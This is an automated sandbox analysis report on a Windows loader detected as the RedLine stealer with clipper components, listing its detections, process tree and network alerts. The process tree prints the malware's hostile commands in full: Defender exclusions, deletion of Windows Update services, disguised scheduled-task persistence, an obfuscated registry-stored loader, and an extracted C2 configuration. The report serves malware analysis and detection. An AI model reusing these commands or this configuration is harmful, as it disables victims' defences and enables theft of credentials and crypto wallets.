Edit tour
Windows
Analysis Report
Loader.exe
Overview
General Information
Detection
Laplas Clipper, MicroClip, RedLine
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected RedLine Stealer
Sigma detected: Stop multiple services
Yara detected Laplas Clipper
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected MicroClip
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Machine Learning detection for sample
Allocates memory in foreign processes
Creates files in the system32 config directory
Hooks processes query functions (used to hide processes)
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality to inject code into remote processes
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Hooks files or directories query functions (used to hide files and directories)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses powercfg.exe to modify the power settings
Modifies power options to not sleep / hibernate
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Modifies the prolog of user mode functions (user mode inline hooks)
Found hidden mapped module (file has been removed from disk)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Potential dropper URLs found in powershell memory
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Uses reg.exe to modify the Windows registry
PE file contains more sections than normal
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Creates job files (autostart)
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Is looking for software installed on the system
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Classification
- System is w10x64
- Loader.exe (PID: 5244 cmdline:
C:\Users\u ser\Deskto p\Loader.e xe MD5: 4E0323EDBAFA68173EA06B1EC8B95195) - conhost.exe (PID: 5124 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - AppLaunch.exe (PID: 100012 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\AppL aunch.exe MD5: 6807F903AC06FF7E1670181378690B22) - ofg.exe (PID: 3628 cmdline:
"C:\Users\ user\AppDa ta\Local\M icrosoft\o fg.exe" MD5: CD4AC234EE1C9FCA552D11FF31B9C5CC) - cmd.exe (PID: 4584 cmdline:
cmd.exe "/ C schtasks /create / tn \ipNnOY SRDI /tr \ "C:\Users\ user\AppDa ta\Roaming \ipNnOYSRD I\svcupdat er.exe\" / st 00:00 / du 9999:59 /sc once /ri 1 /f" MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 1436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 5208 cmdline:
schtasks / create /tn \ipNnOYSR DI /tr \"C :\Users\us er\AppData \Roaming\i pNnOYSRDI\ svcupdater .exe\" /st 00:00 /du 9999:59 / sc once /r i 1 /f" MD5: 838D346D1D28F00783B7A6C6BD03A0DA) - brave.exe (PID: 2804 cmdline:
"C:\Users\ user\AppDa ta\Local\M icrosoft\b rave.exe" MD5: 9253ED091D81E076A3037E12AF3DC871) - powershell.exe (PID: 6140 cmdline:
powershell Add-MpPre ference -E xclusionPa th @($env: UserProfil e, $env:Pr ogramFiles ) -Force MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 4908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 6504 cmdline:
cmd /c sc stop UsoSv c & sc sto p WaaSMedi cSvc & sc stop wuaus erv & sc s top bits & sc stop d osvc & reg delete "H KLM\SYSTEM \CurrentCo ntrolSet\S ervices\Us oSvc" /f & reg delet e "HKLM\SY STEM\Curre ntControlS et\Service s\WaaSMedi cSvc" /f & reg delet e "HKLM\SY STEM\Curre ntControlS et\Service s\wuauserv " /f & reg delete "H KLM\SYSTEM \CurrentCo ntrolSet\S ervices\bi ts" /f & r eg delete "HKLM\SYST EM\Current ControlSet \Services\ dosvc" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6520 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - sc.exe (PID: 6604 cmdline:
sc stop Us oSvc MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 6696 cmdline:
sc stop Wa aSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 6764 cmdline:
sc stop wu auserv MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 6796 cmdline:
sc stop bi ts MD5: D79784553A9410D15E04766AAAB77CD6) - sc.exe (PID: 6820 cmdline:
sc stop do svc MD5: D79784553A9410D15E04766AAAB77CD6) - reg.exe (PID: 6876 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \UsoSvc" / f MD5: E3DACF0B31841FA02064B4457D44B357) - reg.exe (PID: 6896 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \WaaSMedic Svc" /f MD5: E3DACF0B31841FA02064B4457D44B357) - reg.exe (PID: 6916 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \wuauserv" /f MD5: E3DACF0B31841FA02064B4457D44B357) - reg.exe (PID: 6960 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \bits" /f MD5: E3DACF0B31841FA02064B4457D44B357) - reg.exe (PID: 7024 cmdline:
reg delete "HKLM\SYS TEM\Curren tControlSe t\Services \dosvc" /f MD5: E3DACF0B31841FA02064B4457D44B357) - cmd.exe (PID: 6512 cmdline:
cmd /c pow ercfg /x - hibernate- timeout-ac 0 & power cfg /x -hi bernate-ti meout-dc 0 & powercf g /x -stan dby-timeou t-ac 0 & p owercfg /x -standby- timeout-dc 0 MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powercfg.exe (PID: 6612 cmdline:
powercfg / x -hiberna te-timeout -ac 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5) - powercfg.exe (PID: 6656 cmdline:
powercfg / x -hiberna te-timeout -dc 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5) - powercfg.exe (PID: 6748 cmdline:
powercfg / x -standby -timeout-a c 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5) - powercfg.exe (PID: 6788 cmdline:
powercfg / x -standby -timeout-d c 0 MD5: 7C749DC22FCB1ED42A87AFA986B720F5) - powershell.exe (PID: 6528 cmdline:
powershell <#ecgxrz# > IF((New- Object Sec urity.Prin cipal.Wind owsPrincip al([Securi ty.Princip al.Windows Identity]: :GetCurren t())).IsIn Role([Secu rity.Princ ipal.Windo wsBuiltInR ole]::Admi nistrator) ) { IF([Sy stem.Envir onment]::O SVersion.V ersion -lt [System.V ersion]"6. 2") { "sch tasks /cre ate /f /sc onlogon / rl highest /ru 'Syst em' /tn 'G oogleUpdat eTaskMachi neQC' /tr '''C:\Prog ram Files\ Google\Chr ome\update r.exe'''" } Else { R egister-Sc heduledTas k -Action (New-Sched uledTaskAc tion -Exec ute 'C:\Pr ogram File s\Google\C hrome\upda ter.exe') -Trigger ( New-Schedu ledTaskTri gger -AtSt artup) -Se ttings (Ne w-Schedule dTaskSetti ngsSet -Al lowStartIf OnBatterie s -Disallo wHardTermi nate -Dont StopIfGoin gOnBatteri es -DontSt opOnIdleEn d -Executi onTimeLimi t (New-Tim eSpan -Day s 1000)) - TaskName ' GoogleUpda teTaskMach ineQC' -Us er 'System ' -RunLeve l 'Highest ' -Force; } } Else { reg add " HKCU\SOFTW ARE\Micros oft\Window s\CurrentV ersion\Run " /v "Goog leUpdateTa skMachineQ C" /t REG_ SZ /f /d ' C:\Program Files\Goo gle\Chrome \updater.e xe' } MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6556 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - dialer.exe (PID: 7188 cmdline:
C:\Windows \system32\ dialer.exe MD5: 0EC74656A7F7667DD94C76081B111827) - powershell.exe (PID: 7196 cmdline:
powershell <#wajvhwi nk#> IF((N ew-Object Security.P rincipal.W indowsPrin cipal([Sec urity.Prin cipal.Wind owsIdentit y]::GetCur rent())).I sInRole([S ecurity.Pr incipal.Wi ndowsBuilt InRole]::A dministrat or)) { sch tasks /run /tn "Goog leUpdateTa skMachineQ C" } Else { "C:\Prog ram Files\ Google\Chr ome\update r.exe" } MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 7228 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 7616 cmdline:
"C:\Window s\system32 \schtasks. exe" /run /tn Google UpdateTask MachineQC MD5: 838D346D1D28F00783B7A6C6BD03A0DA) - setup.exe (PID: 6232 cmdline:
"C:\Users\ user\AppDa ta\Local\M icrosoft\s etup.exe" MD5: 96CBBD2930425374E0D2D6E251BE9834) - powershell.exe (PID: 6264 cmdline:
powershell -enC QQBk AGQALQBNAH AAUAByAGUA ZgBlAHIAZQ BuAGMAZQAg AC0ARQB4AG MAbAB1AHMA aQBvAG4AUA BhAHQAaAAg AEAAKAAnAE MAOgBcAFUA cwBlAHIAcw BcAFIAZQB2 AGUAbABpAG 4AJwAsACAA JwBDADoAXA BQAHIAbwBn AHIAYQBtAC AARgBpAGwA ZQBzACcAKQ AgAC0ARgBv AHIAYwBlAA == MD5: DBA3E6449E97D4E3DF64527EF7012A10) - conhost.exe (PID: 6272 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- svcupdater.exe (PID: 1048 cmdline:
C:\Users\u ser\AppDat a\Roaming\ ipNnOYSRDI \svcupdate r.exe MD5: CD4AC234EE1C9FCA552D11FF31B9C5CC)
- powershell.exe (PID: 7384 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.EXE ". (\"{1}{0}\ " -f 'eT', 'S') (\"6T \"+\"o\") ([tYpE](\" {2}{0}{4}{ 1}{3}\" -F 'e','mBL', 'refl','y' ,'ctiOn.As Se') ) ; $ Dlr4S = [t yPe](\"{3} {1}{2}{4}{ 0}\"-F'Ry' ,'oSOfT.W' ,'iN32.R', 'MICR','eG iST') ; $6 TO::(\"{0} {1}\" -f ' L','oad'). Invoke( (. (\"{1}{2}{ 0}\" -f 't -Item','g' ,'e') (\"v ARI\"+\"Ab \"+\"lE\"+ \":DlR4S\" ) ).\"VA`l uE\"::\"lO c`ALM`AChi ne\".(\"{2 }{1}{0}\" -f 'ey','u bk','OpenS ').Invoke( (\"{1}{0}\ "-f'E','SO FTWAR')).( \"{1}{0}{2 }\" -f'u', 'GetVal',' e').Invoke ((\"{1}{2} {3}{0}\"-f 'ger','dia ','lers',' ta'))).\"E nT`Ryp`OIN t\".\"in`V oKE\"(${n` Ull},${n`U Ll})" MD5: DBA3E6449E97D4E3DF64527EF7012A10) - conhost.exe (PID: 7400 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 7392 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.EXE ". (\"{1}{0}\ " -f 'eT', 'S') (\"6T \"+\"o\") ([tYpE](\" {2}{0}{4}{ 1}{3}\" -F 'e','mBL', 'refl','y' ,'ctiOn.As Se') ) ; $ Dlr4S = [t yPe](\"{3} {1}{2}{4}{ 0}\"-F'Ry' ,'oSOfT.W' ,'iN32.R', 'MICR','eG iST') ; $6 TO::(\"{0} {1}\" -f ' L','oad'). Invoke( (. (\"{1}{2}{ 0}\" -f 't -Item','g' ,'e') (\"v ARI\"+\"Ab \"+\"lE\"+ \":DlR4S\" ) ).\"VA`l uE\"::\"lO c`ALM`AChi ne\".(\"{2 }{1}{0}\" -f 'ey','u bk','OpenS ').Invoke( (\"{1}{0}\ "-f'E','SO FTWAR')).( \"{1}{0}{2 }\" -f'u', 'GetVal',' e').Invoke ((\"{1}{2} {3}{0}\"-f 'ger','dia ','lers',' ta'))).\"E nT`Ryp`OIN t\".\"in`V oKE\"(${n` Ull},${n`U Ll})" MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 7432 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
{"C2 url": ["79.137.204.112:80"], "Bot Id": "@akkkerman", "Message": "Click Close to exit the program. Error code: 1142", "Authorization Header": "0ba115baec822e8fab2188d69bd8b714"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Windows_Rootkit_R77_5bab748b | unknown | unknown |
| |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
Windows_Rootkit_R77_5bab748b | unknown | unknown |
| |
Click to see the 7 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Rootkit_R77_5bab748b | unknown | unknown |
| |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen |
| |
Windows_Rootkit_R77_5bab748b | unknown | unknown |
| |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security | ||
Click to see the 5 entries |
Operating System Destruction |
---|
Source: | Author: Joe Security: |
Timestamp: | 79.137.204.112192.168.2.780497112850353 11/07/22-23:48:32.369814 |
SID: | 2850353 |
Source Port: | 80 |
Destination Port: | 49711 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.779.137.204.11249711802850286 11/07/22-23:49:11.408992 |
SID: | 2850286 |
Source Port: | 49711 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.779.137.204.11249711802850027 11/07/22-23:48:30.299208 |
SID: | 2850027 |
Source Port: | 49711 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 192.168.2.78.8.8.857970532036289 11/07/22-23:50:41.139323 |
SID: | 2036289 |
Source Port: | 57970 |
Destination Port: | 53 |
Protocol: | UDP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira URL Cloud: |
Source: | Avira: |
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Virustotal: | Perma Link |
Source: | ReversingLabs: | |||
Source: | ReversingLabs: | |||
Source: | ReversingLabs: | |||
Source: | ReversingLabs: | |||
Source: | ReversingLabs: | |||
Source: | Metadefender: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Avira: | ||
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_00AFBE04 |
Source: | Code function: | 2_2_0AC21CA8 | |
Source: | Code function: | 2_2_0AC211E8 | |
Source: | Code function: | 2_2_0AC211E8 | |
Source: | Code function: | 2_2_0AC2F490 | |
Source: | Code function: | 2_2_0AC20928 | |
Source: | Code function: | 2_2_0AC2E234 | |
Source: | Code function: | 2_2_0AC2C750 | |
Source: | Code function: | 2_2_0AC2C760 |
Networking |
---|
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | URLs: |
Source: | String found in memory: | ||
Source: | String found in memory: | ||
Source: | String found in memory: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Process created: |
Source: | Code function: | 0_2_00AE36C0 | |
Source: | Code function: | 0_2_00AFA089 | |
Source: | Code function: | 0_2_00B01AF3 | |
Source: | Code function: | 0_2_00AFE42E | |
Source: | Code function: | 0_2_00B01C13 | |
Source: | Code function: | 0_2_00AFFEAA | |
Source: | Code function: | 0_2_00AF06C0 | |
Source: | Code function: | 0_2_00AEDE7B | |
Source: | Code function: | 0_2_00AF4E49 | |
Source: | Code function: | 2_2_053E0908 | |
Source: | Code function: | 2_2_0AC2EB00 | |
Source: | Code function: | 2_2_0AC2BEE0 | |
Source: | Code function: | 2_2_0AC21CA8 | |
Source: | Code function: | 2_2_0AC20CB0 | |
Source: | Code function: | 2_2_0AC2E2E8 | |
Source: | Code function: | 2_2_0AC22248 | |
Source: | Code function: | 2_2_0AC20040 | |
Source: | Code function: | 2_2_0AC211E8 | |
Source: | Code function: | 2_2_0AC2D588 | |
Source: | Code function: | 2_2_0AC28A88 | |
Source: | Code function: | 2_2_0AC28A77 | |
Source: | Code function: | 2_2_0AC2A8D0 | |
Source: | Code function: | 2_2_0AC21C98 | |
Source: | Code function: | 2_2_0AC20CA0 | |
Source: | Code function: | 2_2_0AC2E2DB | |
Source: | Code function: | 2_2_0AC2A3A0 | |
Source: | Code function: | 2_2_0AC211D9 |
Source: | Process created: |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Static PE information: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | File deleted: |
Source: | File created: |
Source: | Code function: |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
